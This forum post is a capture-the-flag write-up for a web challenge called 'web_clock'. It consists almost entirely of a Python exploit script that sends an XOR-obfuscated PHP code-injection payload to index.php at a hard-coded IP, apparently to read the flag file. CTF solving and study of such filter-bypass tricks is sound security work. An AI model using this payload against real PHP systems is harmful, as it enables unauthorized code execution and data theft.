roger 发表于 2021-4-6 22:56:35

web_clock_writeup



exp:
import re
import requests


def exp(ip,port):
    poc = '/index.php?code=${%22!%22^%22~%22}=%22[][][@%22^%22($()%3E-%22;${%22(%22^%22)%22}=%22]]]]%22^%22%3E%3C)}%22;${%22{%22^%22}%22}=%22]@:]%22^%22;,[:%22;${%22!%22^%22~%22}(${%22(%22^%22)%22}.%22/%22.${%22{%22^%22}%22});'
    url = r'http://'+str(ip)+':'+str(port)+str(poc)
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0'}
    try:
      response = requests.get(url=url,headers=headers,timeout=2)
      if (re.search('flag(.*)', response.text) != None):
            pattern = re.compile('flag(.*)')
            flag_result = re.search(pattern, response.text)
            return("获取flag为:"+ str(flag_result.group(1)))
      else:
            return("未能读取到flag")
    except Exception as ex:
      return(ex)


if __name__ == "__main__":
    ip = '123.57.255.244'
    port = 80
    print(exp(ip,port))

页: [1]
查看完整版本: web_clock_writeup